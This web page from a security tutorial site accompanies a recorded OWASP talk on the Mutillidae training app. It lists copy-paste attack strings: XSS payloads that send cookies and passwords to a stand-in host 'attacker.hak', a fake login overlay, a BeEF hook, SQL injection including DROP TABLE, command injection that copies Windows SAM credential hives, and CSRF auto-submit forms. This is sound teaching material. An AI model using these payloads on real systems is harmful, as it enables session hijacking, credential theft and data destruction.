OWASP Top 5 and Mutillidae: Intro to common web vulnerabilities like Cross Site Scripting (XSS), SQL/Command Injection Flaws, Malicious File Execution/RFI, Insecure Direct Object Reference and Cross Site Request Forgery (CSRF/XSRF) (Hacking Illustrated Series InfoSec Tutorial Videos)

Help Irongeek.com pay for
bandwidth and research equipment:

Web Hosting By:

Sponsored by:

Affiliates:

Irongeek's Featured Links:

Web Hosting

Free Web Hosting hosting

EC-Council ECSA Training Videos

Web Hosting:
Help Irongeek.com pay for bandwidth and research equipment:

OWASP Top 5 and Mutillidae: Intro to common web vulnerabilities like Cross Site Scripting (XSS), SQL/Command Injection Flaws, Malicious File Execution/RFI, Insecure Direct Object Reference and Cross Site Request Forgery (CSRF/XSRF) (Hacking Illustrated Series InfoSec Tutorial Videos) OWASP Top 5 and Mutillidae: Intro to common web vulnerabilities like Cross Site Scripting (XSS), SQL/Command Injection Flaws, Malicious File Execution/RFI, Insecure Direct Object Reference and Cross Site Request Forgery (CSRF/XSRF)

This is a recording of the presentation I gave to the Louisville Chapter of OWASP about the Mutillidae project. A while back I wanted to start covering more web application pen-testing tools and concepts in some of my videos and live classes. Of course, I needed vulnerable web apps to illustrate common web security problems. I like the WebGoat project, but sometimes it's a little hard to figure out exactly what they want you to do to exploit a given web application, and it's written in J2EE (not a layman friendly language). In an attempt to have something simple to use as a demo in my videos and in class, I started the Mutillidae project. This is a video covering the first 5 of the OWASP Top 10.

Slides can be found here

Owasp Louisville 2nd Meeting from Adrian Crenshaw on Vimeo. The AVI can be downloaded from the Vimeo site, but you will need install the Camstudio codec.

XSS code and other stings I injected in the video (provided here for easy copy and pasting):

Simple XSS:
<script>alert("XSS");</script>

Page Redirect XSS:
<script>window.location = "http://www.irongeek.com/"</script>

Cookie Stealing:
<script> new Image().src="http://attacker.hak/catch.php?cookie="+encodeURI(document.cookie); </script>

Password Con XSS:
<script> username=prompt('Please enter your username',' '); password=prompt('Please enter your password',' '); document.write("<img src=\"http://attacker.hak/catch.php?username="+username+"&password="+password+"\">"); </script>

More complicated, but better looking XSS password form:
<div style="position: absolute; width: 30%; z-index: 2; left: 35%; top: 40%; float:left; background-color:#C0C0C0" id="loginlayer"> <form method="POST" name="logonf" > <b>You must login to continue</b> <div align="center"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td>User:</td> <td><input name="userf" size="20"></td> </tr> <tr> <td>Password:</td> <td><input type="password" name="passwordf" size="20"></td> </tr> </table> </div> <p align="center"><input type="button" value="Submit" onClick="submitandhide()"></p> </form> <script> function submitandhide() { document.getElementById("loginlayer").style.display = "none"; temprs = "user=" + document.logonf.userf.value + "&password=" + document.logonf.passwordf.value; var iframe = document.createElement('IFRAME'); iframe.src = ("http://attacker.hak/catch.php?" + temprs); document.body.appendChild(iframe); //help from http://www.gnucitizen.org/blog/javascript-remoting-dangers/ } </script> </div>

Clippy XSS:
<div style="position:fixed; right:60px; bottom:10px; overflow:visible;" id="clippy"> <table valign="top" width="130" height="309" border="0" background="http://www.irongeek.com/images/clippy.png" cellpadding="10"> <tr><td valign="top">Hello, it looks like you have an XSS vulnerability, would you like <a href="http://www.owasp.org/index.php/Cross_site_scripting">some help fixing that?</a></td></tr> </table> </div>

External Javascript:
<script src="http://ha.ckers.org/xss.js"> </script>

Hot BeEF Injection:
<script language='Javascript' src='http://localhost/beef/hook/beefmagic.js.php'></script>

User Agent Example: <useragentswitcher><useragent description="XSS Test" useragent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0 <script>window.location = "http://www.irongeek.com/"</script>)" appname="Microsoft Internet Explorer" appversion="4.0 (compatible; MSIE 7.0; Windows NT 6.0)" platform="Win32" vendor="" vendorsub=""/></useragentswitcher>

SQL Injection Strings:
'
'; DROP TABLE owasp10; --
' or 1=1 --
' + password --

Command Injection Strings:
&& dir
&& wmic process list
&& wmic useraccount list
&& copy c:\WINDOWS\repair\sam && copy c:\WINDOWS\repair\system.bak
&& copy C:\Windows\System32\config\RegBack\sam.old && copy C:\Windows\System32\config\RegBack\SYSTEM.OLD

File includes:
at source viewer:
http://target.hak/index.php?page=source-viewer.php&php_file_name=config.inc

CSRF/XSRF Examples:

IMG get:
<img src="http://target.hak/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy">

IFRAME Get:
<iframe src="http://target.hak/index.php?page=add-to-your-blog.php&input_from_form=hi%20there%20monkeyboy"" style="width:0px; height:0px; border: 0px"></iframe>

Post method:
<html> <body> <form name="csrfform" method="post" action="http://target.hak/index.php?page=add-to-your-blog.php"> <input type='hidden' name='input_from_form' value="Test of of auto submitted form."> </form> <script> document.csrfform.submit() </script> </body> </html>

Printable version of this article

blog comments powered by Disqus

Ten most recent posts on Irongeek.com:

If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.